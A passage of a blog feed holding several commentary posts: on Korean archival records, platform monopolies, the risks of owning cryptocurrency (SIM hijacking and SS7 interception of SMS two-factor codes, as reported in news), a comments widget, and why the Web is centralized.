href="https://en.wikipedia.org/wiki/Haeinsa">Haeinsa</a>:<br /><blockquote>most notable for being the home of the <i><a href="https://en.wikipedia.org/wiki/Tripitaka_Koreana" title="Tripitaka Koreana">Tripitaka Koreana</a>,</i> the whole of the Buddhist Scriptures carved onto 81,350 wooden printing blocks, which it has housed since 1398.</blockquote>Winston Smith in "1984" was an editor for the Ministry of Truth; he "<a href="https://en.wikipedia.org/wiki/Nineteen_Eighty-Four">rewrites records and alters photographs to conform to the state's ever-changing version of history itself</a>". George Orwell wasn't a prophet. Throughout history, governments of all stripes have found the need to employ Winston Smiths and the Joseon dynasty was no exception. But the Koreans of that era even <a href="https://en.wikipedia.org/wiki/Veritable_Records_of_the_Joseon_Dynasty#Compilation">defended against their Winston Smiths</a>:<br /><blockquote>In the Later Joseon period when there was intense conflict between different political factions, revision or rewriting of <i>sillok</i> by rival factions took place, but they were identified as such, and the original version was preserved.</blockquote>Today's eclipse records would be on the Web, not paper or bone. Will astronomers 3200 or even only 580 years from now be able to use them?David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com4tag:blogger.com,1999:blog-4503292949532760618.post-8867766429731485352017-09-01T10:00:00.000-07:002017-09-01T10:00:03.052-07:00Josh Marshall on GoogleJust a quick note to direct you to Josh Marshall's must-read <a href="http://talkingpointsmemo.com/edblog/a-serf-on-googles-farm"><i>A Serf on Google's Farm</i></a>. It is a deep dive into the details of the relationship between <a href="http://talkingpointsmemo.com/"><i>Talking Points Memo</i></a>, a fairly successful independent news publisher, and Google. It is essential reading for anyone trying to understand the business of publishing on the Web. Below the fold, pointers to a couple of other important works in this area.<br /><a name='more'></a><br />Josh also illuminates the bigger picture of the monopoly power of platforms, as detailed in Lina Khan's masterful <i>Yale Law Journal</i> article <a href="http://www.yalelawjournal.org/note/amazons-antitrust-paradox"><i>Amazon's Antitrust Paradox</i></a> (also a must-read, even at 24,000 words). Josh concludes: <br /><blockquote>"It’s a structural issue. Monopolies are bad for the economy and they’re bad politically. They also have perverse consequences across the board. The money that used to fund your favorite website is now going to Google and Facebook, which doesn’t produce any news at all.<br /><br />We could see this coming a few years ago. And we made a decisive and longterm push to restructure our business around subscriptions. So I’m confident we will be fine. But journalism is not fine right now. And journalism is only one industry the platform monopolies affect. Monopolies are bad for all the reasons people used to think they were bad. They raise costs. They stifle innovation. They lower wages. And they have perverse political effects too. Huge and entrenched concentrations of wealth create entrenched and dangerous locuses of political power.<br /><br />So we will keep using all of Google’s gizmos and services and keep cashing their checks. Hopefully, they won’t see this post and get mad. In the microcosm, it works for us. It’s good money. But big picture … Google is a big, big problem. So is Facebook. So is Amazon. Monopolies are a big, lumbering cause of many of our current afflictions. And we’re only now, slowly, beginning to realize it."</blockquote>Tip of the hat to <a href="https://boingboing.net/2017/08/07/economists-so-fragile.html">Cory Doctorow</a> for pointing me to both Lina Kahn's work and also to the draft of <a href="http://economistsview.typepad.com/files/formation-of-capital-and-wealth-draft-5-07-2017.pdf">On the Formation of Capital and Wealth</a>, by Stanford's Mordecai Kurz. From the abstract:<br /><blockquote>We show modern information technology ... is the cause of rising income and wealth inequality since the 1970's and has contributed to slow growth of wages and decline in the natural rate.<br /><br />We first study all US firms whose securities trade on public exchanges. Surplus wealth of a firm is the difference between wealth created (equity and debt) and its capital. ... aggregate surplus wealth rose from -$0.59 Trillion in 1974 to $24 Trillion ... in 2015 and reflects rising monopoly power. The added wealth was created mostly in sectors transformed by IT. Declining or slow growing firms with broadly distributed ownership have been replaced by IT based firms with highly concentrated ownership. ... We explain why IT innovations enable and accelerate the erection of barriers to entry and once erected, IT facilitates maintenance of restraints on competition. These innovations also explain rising size of firms.<br /><br />We next develop a model where firms have monopoly power. Monopoly surplus is unobservable and we deduce it with three methods, based on surplus wealth, share of labor or share of profits. Share of monopoly surplus rose from zero in early 1980's to 23% in 2015. This last result is, remarkably, deduced by all three methods. </blockquote>David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com3tag:blogger.com,1999:blog-4503292949532760618.post-85082608428240959112017-08-29T08:00:00.001-07:002017-08-29T08:00:16.698-07:00Don't own cryptocurrenciesA year ago I ended a post entitled <a href="http://blog.dshr.org/2016/08/the-120k-btc-heist.html"><i>The 120K BTC Heist</i></a>:<br /><blockquote class="tr_bq">So in practice blockchains are decentralized (<a href="http://blog.dshr.org/2014/10/economies-of-scale-in-peer-to-peer.html">not</a>), anonymous (<a href="https://coinlab.com/blog/post/exploring/">not</a> and <a href="http://dl.acm.org/citation.cfm?id=2699128">not</a>), immutable (<a href="http://www.coindesk.com/hard-fork-ethereum-dao/">not</a>), secure (<a href="http://www.reuters.com/article/us-bitfinex-hacked-hongkong-idUSKCN10E0KP">not</a>), fast (<a href="https://blockchain.info/charts/median-confirmation-time">not</a>) and cheap (<a href="https://blockchain.info/charts/cost-per-transaction">not</a>). What's (not) to like?&nbsp; </blockquote>Below the fold, I update the answer to the question with news you can use if you're a cryptocurrency owner.<br /><a name='more'></a><br />Many Americans evidently believe that cryptocurrencies are anonymous enough to use <a href="http://www.thedailybeast.com/irs-now-has-a-tool-to-unmask-bitcoin-tax-cheats">bitcoin to evade taxes</a>:<br /><blockquote class="tr_bq">The IRS has claimed that only <a href="http://fortune.com/2017/03/19/irs-bitcoin-lawsuit/">802 people declared bitcoin losses or profits</a> in 2015; clearly fewer than the actual number of people trading the cryptocurrency—especially as more investors dip into the world of cryptocurrencies, and the value of bitcoin punches past the $4,000 mark. Maybe lots of bitcoin traders didn't realize the government expects to collect tax on their digital earnings, or perhaps some thought they'd be able to get away with stockpiling bitcoin thanks to the perception that the cryptocurrency is largely anonymous.</blockquote>Perhaps they should <a href="http://www.thedailybeast.com/irs-now-has-a-tool-to-unmask-bitcoin-tax-cheats">reconsider</a>:<br /><blockquote class="tr_bq">[the IRS] has purchased specialist software to track those using bitcoin, <a href="https://www.documentcloud.org/documents/3935924-IRS-Chainalysis-Contract.html">according to a contract</a> obtained by The Daily Beast.</blockquote>Especially, as Zeljka Zorz reports at Helpnetsecurity, if they used their <a href="https://www.helpnetsecurity.com/2017/08/21/identify-users-behind-bitcoin-transactions/">bitcoin to buy something</a>:<br /><blockquote class="tr_bq">More and more shopping Web sites accept cryptocurrencies as a method of payment, but users should be aware that these transactions can be used to deanonymize them – even if they are using blockchain anonymity techniques such as <a href="https://en.wikipedia.org/wiki/CoinJoin" target="_blank">CoinJoin</a>.<br /><br />Independent researcher Dillon Reisman and Steven Goldfeder, Harry Kalodner and Arvind Narayanan from Princeton University have demonstrated that third-party online tracking provides enough information to identify a transaction on the blockchain, link it to the user’s cookie and, ultimately, to the user’s real identity.</blockquote>The paper is <a href="https://arxiv.org/pdf/1708.04748.pdf">here</a>. But owning bitcoins is a <a href="https://techcrunch.com/2017/08/23/i-was-hacked/">problem even if you don't use them to buy anything</a> [my emphasis]:<br /><blockquote class="tr_bq">First the hacker grabbed access to my friend’s Facebook Messenger and contacted everyone on his list that was interested in cryptocurrency, including me. ... <i>Once it was clear that I had some bitcoin somewhere the hackers decided I was their next target</i>.</blockquote>Once you're a target the bad guys have two techniques for grabbing bitcoin from savvy owners who have enabled two-factor authentication (2FA) on their accounts using SMS, which is by far the most common 2FA technique. The first is <a href="https://techcrunch.com/2017/08/23/i-was-hacked/">SIM hijacking</a>:<br /><blockquote class="tr_bq">a hacker swapped his or her own SIM card with mine, presumably by calling T-Mobile. This, in turn, shut off network services to my phone and, moments later, allowed the hacker to change most of my Gmail passwords, my Facebook password, and text on my behalf. All of the two-factor notifications went, by default, to my phone number so I received none of them and in about two minutes I was locked out of my digital life.</blockquote>This has become a routine ocurrence, as Nathaniel Popper reports in <a href="https://www.nytimes.com/2017/08/21/business/dealbook/phone-hack-bitcoin-virtual-currency.html"><i>Identity Thieves Hijack Cellphone Accounts to Go After Virtual Currency</i></a>:<br /><blockquote class="tr_bq">“My iPad restarted, my phone restarted and my computer restarted, and that’s when I got the cold sweat and was like, ‘O.K., this is really serious,’” said Chris Burniske, a virtual currency investor who lost control of his phone number late last year.<br /><br />A wide array of people have complained about being successfully targeted by this sort of attack, including a Black Lives Matter activist and <a href="https://www.ftc.gov/news-events/blogs/techftc/2016/06/your-mobile-phone-account-could-be-hijacked-identity-thief#othervictims"> the chief technologist of the Federal Trade Commission</a>. The commission’s own data shows that the number of so-called phone hijackings has been rising. In January 2013, there were 1,038 such incidents reported; by January 2016, that number had increased to 2,658.<br /><br />But a particularly concentrated wave of attacks has hit those with the most obviously valuable online accounts: virtual currency fanatics like Mr. Burniske.<br /><br />Within minutes of getting control of Mr. Burniske’s phone, his attackers had changed the password on his virtual currency wallet and drained the contents — some $150,000 at today’s values.<br /><br />...<br /><br />“Everybody I know in the cryptocurrency space has gotten their phone number stolen,” said Joby Weeks, a Bitcoin entrepreneur.<br /><br />Mr. Weeks lost his phone number and about a million dollars’ worth of virtual currency late last year, despite having asked his mobile phone provider for additional security after his wife and parents lost control of their phone numbers.<br /><br />The attackers appear to be focusing on anyone who talks on social media about owning virtual currencies or anyone who is known to invest in virtual currency companies, such as venture capitalists. And virtual currency transactions are designed to be irreversible.</blockquote>The problem is that the security of your account depends on the ability of your cellphone carrier's front-line support to resist social engineering, a <a href="https://www.nytimes.com/2017/08/21/business/dealbook/phone-hack-bitcoin-virtual-currency.html">notoriously weak defense</a>:<br /><blockquote class="tr_bq">Adam Pokornicky, a managing partner at Cryptochain Capital, asked Verizon to put extra security measures on his account after he learned that an attacker had called in 13 times trying to move his number to a new phone.<br /><br />But just a day later, he said, the attacker persuaded a different Verizon agent to change Mr. Pokornicky’s number without requiring the new PIN. </blockquote>The second technique is <a href="https://arstechnica.com/information-technology/2017/05/thieves-drain-2fa-protected-bank-accounts-by-abusing-ss7-routing-protocol/">abusing the SS7 signalling protocol:</a><br /><blockquote class="tr_bq">A known security hole in the networking protocol used by cellphone providers around the world played a key role in a recent string of attacks that drained bank customer accounts, according to a report published Wednesday.<br /><br /><aside class="pullbox sidebar story-sidebar right"><br /></aside>The unidentified attackers exploited weaknesses in <a href="https://en.wikipedia.org/wiki/Signalling_System_No._7">Signalling System No. 7</a>, a telephony signaling language that more than 800 telecommunications companies around the world use to ensure their networks interoperate. SS7, as the protocol is known, makes it possible for a person in one country to send text messages to someone in another country. It also allows phone calls to go uninterrupted when the caller is traveling on a train.<br /><br />The same functionality can be used to eavesdrop on conversations, track geographic whereabouts, or intercept text messages. Security researchers demonstrated this dark side of SS7 last year when they <a href="https://arstechnica.com/security/2016/04/how-hackers-eavesdropped-on-a-us-congressman-using-only-his-phone-number/">stalked US Representative Ted Lieu</a> using nothing more than his 10-digit cell phone number and access to an SS7 network.<br /><br />In January, thieves exploited SS7 weaknesses to bypass two-factor authentication banks used to prevent unauthorized withdrawals from online accounts, the German-based newspaper <a href="http://www.sueddeutsche.de/digital/it-sicherheit-schwachstelle-im-mobilfunknetz-kriminelle-hacker-raeumen-konten-leer-1.3486504"><i>Süddeutsche Zeitung</i> reported</a>. Specifically, the attackers used SS7 to redirect the text messages the banks used to send one-time passwords. Instead of being delivered to the phones of designated account holders, the text messages were diverted to numbers controlled by the attackers. The attackers then used the mTANs—short for "mobile transaction authentication numbers"—to transfer money out of the accounts.</blockquote>Because the vulnerability is a basic feature of SS7 implementations, there is nothing you can do to defend against the SS7 attack except not using phones for 2FA.<br /><br />So, if you own bitcoin:<br /><ul><li>Don't use them to buy anything.</li><li>Don't, especially, use them to do anything illegal. </li><li>Don't let anyone know that you own them.</li><li>Don't write anything on-line sounding even mildly enthusiastic about cryptocurrencies.</li><li>Don't use phone-based 2FA on any of your accounts.</li><li>Do report any gains and losses to the tax authorities in your country.</li></ul>Have fun!<br /><br /><br /><br /><br />David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com15tag:blogger.com,1999:blog-4503292949532760618.post-51149921007072968922017-08-28T08:00:00.000-07:002017-08-28T08:00:00.147-07:00Recent Comments WidgetI added a "Recent Comments" widget to the sidebar of my blog. I should have done this a long time ago, sorry! The reason it is needed is that I frequently add comments to old, sometimes very old, posts as a way of tracking developments that don't warrant a whole new post.<br /><br />For example, my post from last December <a href="http://blog.dshr.org/2016/12/bitag-on-iot.html"><i>BITAG on the IoT</i></a> has accumulated 52 comments, the <a href="http://blog.dshr.org/2016/12/bitag-on-iot.html?showComment=1503696626856#c66678455469015777">most recent from August 25<sup>th</sup></a>. That's more than one a week! I've been using it as a place to post notes about the evolving security disaster that is the IoT. I need to do a new post about the IoT but it hasn't risen to the top of the stack of draft posts yet.<br /><br />One thing the widget will show is that not many of you comment on my posts. I'm really very grateful to those who do, so please take the risk of commenting. I moderate comments, so they don't show up immediately. And if I think they're off-topic or unsuitable they won't show up at all. But comments I disagree with are welcome, and can spark a useful exchange. See, for example, the discussion of inflation in the comments on <a href="http://blog.dshr.org/2017/08/economic-model-of-long-term-storage.html"><i>Economic Model of Long-Term Storage</i></a>, which clarified a point I thought was obvious but clearly wasn't. Thank you, Rick Levine!<br /><br />Hat tip to <a href="https://www.makingdifferent.com/author/nitin/">Nitin Maheta</a>,&nbsp; from whose <a href="http://www.makingdifferent.com/recent-comments-widget-with-avatar-for-blogger/">recent comments widget</a> mine was adapted.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com2tag:blogger.com,1999:blog-4503292949532760618.post-89283694291564727202017-08-24T08:00:00.002-07:002017-08-24T08:00:01.395-07:00Why Is The Web "Centralized"?There is a groundswell of opinion, which I share, in favor of a "decentralized Web" that has continued after last year's "<a href="http://blog.dshr.org/2016/06/decentralized-web-summit.html">Decentralized Web Summit</a>". A wealth of different technologies for implementing a decentralized Web are competing for attention. But the basic protocols of the Internet and the Web (IP, TCP, DNS, HTTP, ...) aren't centralized. What is the centralization that decentralized Web advocates are reacting against? Clearly, it is the domination of the Web by the FANG (Facebook, Amazon, Netflix, Google) and a few other large companies such as the cable oligopoly.<br /><br />These companies came to dominate the Web for <i>economic</i> not technological reasons. The Web, like other technology markets, has very large increasing returns to scale (network effects, duh!). These companies build centralized systems using technology that isn't inherently centralized but which has increasing returns to scale. It is the increasing returns to scale that drive the centralization.<br /><br />Unless decentralized <i>technologies</i> specifically address the issue of how to avoid increasing returns to scale they will not, of themselves, fix this <i>economic</i> problem. Their increasing returns to scale will drive layering centralized businesses on top of decentralized infrastructure, replicating the problem we face now, just on different infrastructure.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com1